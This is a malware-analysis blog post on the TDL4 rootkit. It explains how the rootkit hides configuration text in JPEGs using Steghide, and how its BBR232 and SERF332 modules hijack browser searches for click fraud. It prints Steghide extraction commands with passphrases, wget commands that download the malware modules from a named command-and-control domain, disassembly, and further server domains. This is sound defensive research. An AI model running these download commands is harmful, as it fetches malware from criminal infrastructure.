Tuesday, 23 October 2012

Analysis of TDL4 (Part III)

More About steganography

A closer look at the COM32 component of TDL4, a component that decrypts configuration text from the JPEG images hosted at imageshack.us and posted into the blogs, reveals that COM32 is a rip-off of the open source project called Steghide - a steganography program, developed by Stefan Hetzl.

Because COM32 is compiled from the publicly available source files, you don't even need to download COM32 module to decrypt the images. Just download the Steghide software, and run it against a JPEG image that can be found on TDL4 blogs.

For example, configuration text from the images 1, 2, and 3 can be recovered by running Steghide as:

steghide.exe extract -sf image.jpg -p A6rprm09lZnVsCn -xf config.txt

Text from another blog's images (4, 5, and 6) can be obtained by running Steghide as:

steghide.exe extract -sf image.jpg -p TOWasfO03gGff58 -xf config.txt

where A6rprm09lZnVsCn and TOWasfO03gGff58 are the passphrases resulted after decrypting the strings jt5G/KE25R1VSaYny0rr and m6dj7aA9mhQKdI8X3jy9 from the original configuration file by using RC4 key #1.

BBR232/BBR264 and SERF332/SERF364

These additional modules are downloaded from C&C servers and then loaded into the address space of the browsers. Their purpose is to hijack browsing activity and to re-direct users into various dodgy websites, skewing Google search results, and also serving pop-ups with fake AV products, porn, gambling sites, etc.

To fetch the modules from C&C, the following URL parameters are used:

mode=mod&filename=bbr232 encrypted as CehOKSsUCKLC3skBxcO9fFpCcHXx4Nlw
mode=mod&filename=serf332 encrypted as CehOKSsUCKLC3skBxcO9fFpCYXLxtNlxPw==

Thus, wget will fetch them when run as:

wget wahinotisifatu.com/?CehOKSsUCKLC3skBxcO9fFpCcHXx4Nlw -U "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv: GeckaSeka/20090911 Firefox/3.5.1"
wget wahinotisifatu.com/?CehOKSsUCKLC3skBxcO9fFpCYXLxtNlxPw== -U "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv: GeckaSeka/20090911 Firefox/3.5.1"

Once decrypted the same way as demonstrated in the previous blog post, BBR232 reveals itself as a module that hijacks Internet Explorer, Chrome, Safari, Opera, Firefox, and Opera browsers. SERF332 is designed for Internet Explorer only as it relies on parsing the window structure of the browser process. BBR264 and SERF364 modules are designed to support 64-bit versions of the browsers.

For example, when processing an intercepted GET request below:

.text:100156E3 mov edi, ds:StrCmpNIA
.text:100156E9 push 4
.text:100156EB push offset aGet ; "GET "
.text:100156F0 push ebx
.text:100156F1 call edi ; StrCmpNIA
.text:100156F3 test eax, eax
.text:100156F5 jnz short check_POST_Request
.text:100156F7 mov edx, [esp+20h+var_10]
.text:100156FB push edx
.text:100156FC mov ecx, ebx
.text:100156FE call process_GET_request
BBR232 will make sure the host name does not contain any of the following strings:

  • yimg.

  • rds.yahoo.

  • google.

  • .google

  • bing.

  • yahoo.

  • atdmt.

  • aolcdn.

  • atwola.com

  • .aol.

  • dmn.aol.

  • sa.aol.

  • .icq.

  • dw.com.

  • .gstatic.

  • img.youtube.

  • i.i.com.

  • google-analytics.com

  • .everesttech.

  • .ixnp.

  • googleapis.

  • .alexametrics.

  • scorecardresearch.com

  • alltheweb.

  • altavista.

  • microsofttranslator.

  • microsofttranslator.

  • askcache.

  • searchapi.search.aol.

  • cc.msnscache.com

  • .googlehosted.com

  • gesualdo.alexa.

BBR232 will also make sure that the requested web page is not pre-fetched by the browser.

In addition, it makes sure the URL string does not include the following strings:

  • search/cache

  • /search/search

  • search/redir

  • counter.yadro.ru

  • gstatic.com/inputtools

  • recaptcha_ajax.js

  • icq.com/js/cookie_lib.js

  • survey.122.2o7.net

  • fls.doubleclick.net

  • alexa.com

  • facebook.

Next, BBR232 is able to modify the requested URL by replacing the HTTP referer in it, or replacing some URL parameters, such as "url=". The hijacking logic of what needs to be modified in the browser session is defined by a configuration file, where page redirects or HTTP referer replacements are defined in the sections enclosed with the tags [redir_urls_begin]/[redir_urls_end], and [ref_replace_begin]/[ref_replace_end] respectively. The redirect configuration may potentially be fetched from the servers:

  • wanstatcteery.com

  • wahinotisifatu.com

  • owtotmyne.com

As a result, when the user clicks a link returned by Google Search, the "url=" parameter will be replaced with a different web page, leading to skewed analytics, fraudulent monetization via AdSense, clickjacking, Search Engine Optimisation (SEO) poisoning, and other click fraud that constitutes the "cash cow" business for the TDL/TDSS group.